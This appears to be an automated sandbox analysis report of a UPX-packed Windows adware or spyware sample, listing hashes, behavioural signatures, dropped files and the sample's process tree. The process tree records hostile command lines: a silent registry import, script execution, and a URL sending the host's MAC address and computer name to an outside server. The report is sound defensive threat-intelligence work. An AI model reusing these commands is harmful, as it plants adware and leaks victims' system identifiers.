Overview

overview

7

Static

static

7

c94edec63a...18.exe

windows7-x64

7

c94edec63a...18.exe

windows10-2004-x64

7

Analysis

  • max time kernel
    122s
  • max time network
    134s
  • platform
    windows7_x64
  • resource
    win7-20240705-en
  • resource tags

    arch:x64arch:x86image:win7-20240705-enlocale:en-usos:windows7-x64system
  • submitted
    29/08/2024, 17:46

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    c94edec63a3c932df38e954b961b11f8_JaffaCakes118.exe

  • Size

    192KB

  • MD5

    c94edec63a3c932df38e954b961b11f8

  • SHA1

    f868c1d8ef4f9bd03857146f900a00262b8cbf9a

  • SHA256

    599773f20bdf1fb9e692e82714c36355eadf345907bda66cadfcb8e25a0be902

  • SHA512

    234ae37a9650889a80e4815025bca9978e000c984397420bd3cc2f6aa6c842bcd487e74721f3845562e7a2f9952bba9de0a75d32a85983d5cb3eeb494f1d9a0b

  • SSDEEP

    3072:f0ENLX2tm4mjyIO+kIHrErlOBUY/PNAh:fMIO+NrsM

Score
7/10
discoveryupx

Malware Config

Signatures

  • Deletes itself 1 IoCs
  • UPX packed file 3 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

    upx
  • Drops file in Program Files directory 7 IoCs
  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 9 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Modifies Internet Explorer settings 1 TTPs 36 IoCs
    adwarespyware
  • Modifies registry class 64 IoCs
  • Runs .reg file with regedit 1 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of SetWindowsHookEx 11 IoCs
  • Suspicious use of WriteProcessMemory 40 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\c94edec63a3c932df38e954b961b11f8_JaffaCakes118.exe
    "C:\Users\Admin\AppData\Local\Temp\c94edec63a3c932df38e954b961b11f8_JaffaCakes118.exe"
    1⤵
    • Drops file in Program Files directory
    • Drops file in Windows directory
    • System Location Discovery: System Language Discovery
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1856
    • C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c regedit /s "C:\Program Files\Common Files\tk.reg"
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:3016
      • C:\Windows\SysWOW64\regedit.exe
        regedit /s "C:\Program Files\Common Files\tk.reg"
        3⤵
        • System Location Discovery: System Language Discovery
        • Modifies registry class
        • Runs .reg file with regedit
        PID:2188
    • C:\Windows\SysWOW64\Cmd.exe
      Cmd.exe /c CScript /nologo "C:\Program Files\Common Files\pack.wsf" "C:\Program Files\Common Files\1_fwnqdoerg.dqpaw" >> "C:\Program Files\Common Files\fwnqdoerg.dqpaw"
      2⤵
      • Drops file in Program Files directory
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2768
      • C:\Windows\SysWOW64\cscript.exe
        CScript /nologo "C:\Program Files\Common Files\pack.wsf" "C:\Program Files\Common Files\1_fwnqdoerg.dqpaw"
        3⤵
        • System Location Discovery: System Language Discovery
        PID:2252
    • C:\Windows\SysWow64\WScript.exe
      "C:\Windows\SysWow64\WScript.exe" "C:\Program Files\Common Files\fwnqdoerg.dqpaw"
      2⤵
      • Drops file in Program Files directory
      • System Location Discovery: System Language Discovery
      • Modifies registry class
      • Suspicious use of WriteProcessMemory
      PID:2640
      • C:\Program Files\Internet Explorer\iexplore.exe
        "C:\Program Files\Internet Explorer\iexplore.exe" http://www.58lala.com/?bymf
        3⤵
        • Modifies Internet Explorer settings
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of SetWindowsHookEx
        • Suspicious use of WriteProcessMemory
        PID:3032
        • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
          "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3032 CREDAT:275457 /prefetch:2
          4⤵
          • System Location Discovery: System Language Discovery
          • Modifies Internet Explorer settings
          • Suspicious use of SetWindowsHookEx
          PID:2928
        • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
          "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3032 CREDAT:3421196 /prefetch:2
          4⤵
          • System Location Discovery: System Language Discovery
          • Modifies Internet Explorer settings
          • Suspicious use of SetWindowsHookEx
          PID:1036
    • C:\Program Files\Internet Explorer\iexplore.exe
      "C:\Program Files\Internet Explorer\iexplore.exe" http://www1.4728.net/setuptj.asp?a_ip=&a_mac=EE:50:17:30:81:07&a_cpname=PSBQWFYT&a_user=bymf&a_locip=0.0.0.0
      2⤵
        PID:2228
      • \??\c:\windows\SysWOW64\wscript.exe
        c:\windows\system32\wscript.exe C:\Users\Admin\AppData\Local\Temp\Killme.vbs
        2⤵
        • Deletes itself
        • System Location Discovery: System Language Discovery
        PID:916

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Program Files\Common Files\1_fwnqdoerg.dqpaw
      Filesize

      51KB

      MD5

      656c0b3a84eeee7d6fc30c0344a7d67b

      SHA1

      9c315d101b30b8174f71449a45db1834e2f230fb

      SHA256

      b7a87e7ebc673a1f2c6562355d5c0418dc758e888d81a9c10a9097e7285ccc2e

      SHA512

      463db19fac5099efb17585487b80ecae8d382fd75886c77f55d513849ea8daf39fd496319d5d2b8e5cae8e9889768c7e634ea66d363e9db66ff18ec0f60a42c7

      Download Submit

    • C:\Program Files\Common Files\fwnqdoerg.dqpaw
      Filesize

      40KB

      MD5

      588c92a8a6c65a19e628d72ee7d37411

      SHA1

      90063578ca37e9c89be8c7caab30a58a67b89fe9

      SHA256

      efb5af3687ed93136c49d27c53a18c475ff9dee849d9b92836c073b3bb088022

      SHA512

      b041a59988d9901a50e1da72b9d5186db6432ff74ef1d0148861ce5d062c2ccd59fe8ad7c9496174d7f3986c24c4ed1f656a56afd4daa8cdb453e328e80f81ac

      Download Submit

    • C:\Program Files\Common Files\pack.wsf
      Filesize

      8KB

      MD5

      a83fdf4f29a7e978d33eeb3674df531b

      SHA1

      60ea7b41816bc2044a6224e38352e56667d3d5ed

      SHA256

      f85f16fb946e6b4d7ef4f6523276a52b4a68d04bdf340312adc2ccdef4cee845

      SHA512

      7ad293f3032054c7e55e89a558dde1e4465c31c1c9fd612e3f56fc209b40826af5273fe140273cf467a96dcda805f13844fa6244cbe2e113bfcf131117acdbd0

      Download Submit

    • C:\Program Files\Common Files\tk.reg
      Filesize

      4KB

      MD5

      28a4d933f2281a2438e828033710b4a8

      SHA1

      e3cdffd1c2d2744aa2426ffa1a875a5b96fc82f8

      SHA256

      7e12d0b4535853192c076a34dcd84e5c9e9b773e0ed5c91260b9c96a61330064

      SHA512

      96bebd13a7a2aae2540a1958936a0008b0e39e2d9ca287612c20849416d2e4558a2d9a8f360ef2c31512e96d1da607d4a7cebbb92d6c75d96906ae14a9b03e00

      Download Submit

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
      Filesize

      342B

      MD5

      f269423c51b56f51fb73024d061f0581

      SHA1

      c562b894db994f381d5f3d08ce0d5d72c81fa992

      SHA256

      b814183bc0095851aba9c76892687cac7b6094579f73ee7c31450799cd9bd912

      SHA512

      83dbcb28c621db9864ab0edadcfef14023ad55b2063328b104fc80090810f246f71aacbfaeaad7fa6828d31488977234c706ccc1235ffd3b9886f7ddaa9ec91b

      Download Submit

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
      Filesize

      342B

      MD5

      78e1fa7945a6e3f465b43e98cf66c1da

      SHA1

      669dd9c85da906ee80f8a6cc172089ca014b7415

      SHA256

      62f2896c4de8aad2cbef96eeb7395d879c2e61d149b9a11924b0a64310ff7eb0

      SHA512

      24dbf253d8f719b5e65f33a0293a3d75c2004f9dc4f11155c5a7bac9233c2cffbfd3bfbfe7e591fd824d796015309ff8d2eac959666e5bc44d592a3be1b8ec61

      Download Submit

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
      Filesize

      342B

      MD5

      848d9d6e95079d02490219bb2a3309a1

      SHA1

      0723edfd284b1b8175c1912bc9dba71b83385af7

      SHA256

      c588a4fc9a6392a53a91a6877aee13a04a3f8ca2f3a79352168de2432a90d274

      SHA512

      a06a21f1de76bb7b003100616f0ec9091d746d8b46f9eb5588841473f05e25a9ca0a1db01b14a7c490040f54e0bf3ddcce380fc9b78da8bc6b88b97df981f787

      Download Submit

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
      Filesize

      342B

      MD5

      cb7644390d7f53f959247499b7e88765

      SHA1

      8fcb71eb1a71cf2b8ea099b65947b503659a12bc

      SHA256

      3d2e0a0c0edb981ea892cb5305ff5089b4043af81e4b6ecd2f303284d6716d87

      SHA512

      fef223846731675913e294b5764a5aa45f142f115ab32d8689730eb14a7445db2f9c0e72c12612c1b8cd863783ebf83578d365d3454b46e071203031781f74c2

      Download Submit

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
      Filesize

      342B

      MD5

      615926ee599f7cba642e0bd2a33c5f7e

      SHA1

      f78dd91420a1d00a28e91575b7194a2e7f807d66

      SHA256

      74f44c1115c82dc413c44ac3e680bcee8096713342949eed0df121183506fd7c

      SHA512

      083bb1c432cece70176a101d61ee4a2580de81ce0d4b1c5ce8b4d930e6f824a4c212493260294d61de62dc0578f85c603d21e3a28ec87d3c1c07b95469886682

      Download Submit

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
      Filesize

      342B

      MD5

      317e637818fbde76706554d6e009255b

      SHA1

      4af9d374f586cefa6000bbc049dbef67bec6a802

      SHA256

      bd86b84a878eeed7d24a886763b9f3e17179bd4e7d0ec5f284ce18b3f5962a48

      SHA512

      98743fd68c2ab4264aafbf1afca68d95c580d0e1b437c6f1a8344e0f89b0624961a7a2b050dc3d5e6c0544f49d1cc5094579c8c08b8ce5683ab9c96dcfcb3169

      Download Submit

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
      Filesize

      342B

      MD5

      c23cb529ea5ed42d51b8fa896393ee67

      SHA1

      feab2066e5ca8ab1fc28602f059c577dc3b6a9c3

      SHA256

      283f52e5f0c6eda2de86474293c16220ee78e7a32bca214bd2a989ecc430c01d

      SHA512

      09c48534017927e60f5bb28eb543884d7b43ee97620cfa88e71829f60edf2a691826f9eb18d0fe505e136e282aeff660ae2f082e428269683be24e1bb5fd94e6

      Download Submit

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
      Filesize

      342B

      MD5

      8ca18b3421630687a052c3b927fe5fe1

      SHA1

      3bc42b525461b66ec367c01f2018c4ec871b4a2c

      SHA256

      55fe5f24e627cf47c2a81be6567ec863152110bf80d1b18dac5a433ebc7dd761

      SHA512

      6b0b201922e649fce9f71e0a016c285d983998f9b69e117f90db29783df146496a800bb1931aa78f783609f9edeca69b40d039adb04f669ff0d0af068464400b

      Download Submit

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
      Filesize

      342B

      MD5

      30ea1b648374bc96eed6a7a67a256dd2

      SHA1

      ef7b2b2a536840edcf67275150a1b22b034b63ed

      SHA256

      27fa49a23688abd7da427ca301f941eb30b05bc150343326c6614fabf085a2cf

      SHA512

      b39e9ddc19b0ab05ecdef53af019fb046b2b4a81b054188bf829ab3f036c640a957036f21789e94b1705a2045b955ea124549f290011043cda3dc00f09e370dd

      Download Submit

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
      Filesize

      342B

      MD5

      3315e3134409b857c1f7c5605181fcfc

      SHA1

      eef18ba8a834a062bf80d8803d7e9af84297f2c0

      SHA256

      17042f5ca4a6a2f250866e50fda58f06f9945d969f7e94125e4d56abff811884

      SHA512

      40f9277d24e90878dc767815192ef4b3d89f8cc32293f57b525d0a30f801d83fb69028bd96713959121f6ffba57bc38569eb6bec19ae5eb05eab171308887155

      Download Submit

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
      Filesize

      342B

      MD5

      d4b9b15e7a3ced1ff37ed149faf87611

      SHA1

      993edbf1255b3f429ea9d124e9ca12021e53f036

      SHA256

      2988cd147bb9eb0abed6ccf05b50944352728eef79e2625bd7cb05be2e82befb

      SHA512

      8932a29e57f5198c8200b55c6ed3d69b637963f9c3bbe82ad5135e70f22e05838dd01cb7dfe25fe338b68f4922e671802e44bd2b610361d4f7b545c759ca8081

      Download Submit

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
      Filesize

      342B

      MD5

      2086918c37790296f7fa54fbbc938781

      SHA1

      4a3172d83abffaca48e6cca62ad80b023c39964f

      SHA256

      80830c46565c8cb95c99246971693c8399d4eb29a1c3d392f1f4d051d78780c1

      SHA512

      48f00f82dd5e796185d4e43f73827198a2cb56bedf57062d9622eea09c660db3f4745a4913c5ee9cd9d3738f89de1fc4e7eb9bd94b58f8cf778bc677e4738ff7

      Download Submit

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
      Filesize

      342B

      MD5

      6ef60fcc2bd463ce3d499df29716d3e4

      SHA1

      c3b319c11d2e55c25f28d098c92b4e21a3e6ef99

      SHA256

      49ec5ef269792b04fe8ed1bf801f1874cb018674b685da7806344c5fe1ddd75f

      SHA512

      9e4e82813727d3b1a34adcbbf61aa000a6ba082e50f5bf2cd7228e89a5551f50a2f7ee4ed7a63172770cbac0d4b839c1db32536d03abcb48167f6b3016593b5b

      Download Submit

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
      Filesize

      342B

      MD5

      973e5e478a10861bcf8c0421ee1f4132

      SHA1

      27275b898fb12fd9eee7e71fc1a843f6487ed7f4

      SHA256

      009ad93c3072ba13bbb55a5f3b51749a4b826eab440b46fab7fef28d9d3806e6

      SHA512

      2cb578edcababb7540204d414efa4e35563ae1050498734bc4d4a0f074a1abf6b49226739188e6926836e5a472d5f01e6f3af9c60a0a2914b04e68a0700cb308

      Download Submit

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
      Filesize

      342B

      MD5

      a43079514306a29fb96dc2292836e9d2

      SHA1

      e7599f2361de139b19d4ce17e5d74610fb819729

      SHA256

      574123c83f49dc9479f9e5971945e4b46bb37bf35fd498e27d1d4af64be6b187

      SHA512

      64cae01bda320390603b4204421df91ec8793cc0fd8866612fa5deddbc5cf78a5ff39d0fc7012371d24c21cdb7004370271356b425b30d5e047525e81ee97151

      Download Submit

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
      Filesize

      342B

      MD5

      49dd2862c96a4667816418c54e8e558a

      SHA1

      aec4770791ecadec136e17b1e6a3932a27013554

      SHA256

      a235ea7d7a79b582fe44db6e43c5a42856f729f38a086cfc3725ec68689a808f

      SHA512

      3dc5bf665e1e638897a4ee9198426111f3624696a84ff919891ca4bfb52dec077b203892da1943e9cba83fa1f4fbe8e93eb4a02222a2d49d964643bde0305219

      Download Submit

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
      Filesize

      342B

      MD5

      bfeab2fc8cc1561381d2e8ced64d4dd7

      SHA1

      5c6c1d0352e3b3a27119847095938dc4dee6cc7b

      SHA256

      a3296a148b52c12e315e7aae68ebd404022a6ab5fdd9c568c3feb6ba1c1e20d8

      SHA512

      226f15cf6c9b435c35eec34988ab6a5c28fa443fe9877618390442bc6ab23eaf87596e116f7c8284cc29738119104a9a48c8e361916b5185d59969a143a15589

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\Cab957.tmp
      Filesize

      70KB

      MD5

      49aebf8cbd62d92ac215b2923fb1b9f5

      SHA1

      1723be06719828dda65ad804298d0431f6aff976

      SHA256

      b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

      SHA512

      bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\Killme.vbs
      Filesize

      289B

      MD5

      002077d60cba2c69c59a247eba5f8576

      SHA1

      1186fa70a16aaf5f6627c786303116da4c88b0f3

      SHA256

      e44e2eb41c899608c6efdc96c4c6ab7f51251a5e9f3f27f28fdd113101fcfc1f

      SHA512

      ece01ae876693bc814a547791ce5dca4e9c1eb7a2c8bed913b36c01ceb5c94fbd93f63361bd0aff3e9cea983a9a7d86fdc32c4fcfee356041fb7eb1b0a5901d8

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\Tar9C7.tmp
      Filesize

      181KB

      MD5

      4ea6026cf93ec6338144661bf1202cd1

      SHA1

      a1dec9044f750ad887935a01430bf49322fbdcb7

      SHA256

      8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

      SHA512

      6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

      Download Submit

    • C:\Windows\My.ini
      Filesize

      316B

      MD5

      a150e9687af72c7ca2594208ade0f0ac

      SHA1

      9887f17f321b799585b8e26dfbf620468bd7ca1b

      SHA256

      7a5bbec3d820fe6bd3f8106e1f96b053fc9de475e921aa76e07209840679625e

      SHA512

      6d4e9cf702b470bf756705adf359dd9bd261ee93e5e88d8bd6bf1a5e597142389bdedf484fbc463870f9ffc9b31a5babec81737b488d003a3799c5c777ef02b8

      Download Submit

    • C:\Windows\My.ini
      Filesize

      109B

      MD5

      75d2a261da17ef5b58d872339b3cb212

      SHA1

      2a39fe16872eadb085f5f7b93cb69a58c679f36a

      SHA256

      41a8f01899f29f41d9cfdfe14ca33ba145e47e6d9c160745f5bd6591bc1c9f04

      SHA512

      945cd316d7353dd33a8fd9ee0f111cab10f3e11d68287df06231a38a22f0f049afb019835bfb998bab55f4357fae3ba134d58d54573f862053525f7d9875a45f

      Download Submit

    • memory/1856-0-0x0000000000400000-0x0000000000431000-memory.dmp

      Filesize

      196KB

      Download

    • memory/1856-23-0x0000000000400000-0x0000000000431000-memory.dmp

      Filesize

      196KB

      Download

    • memory/1856-36-0x0000000000400000-0x0000000000431000-memory.dmp

      Filesize

      196KB

      Download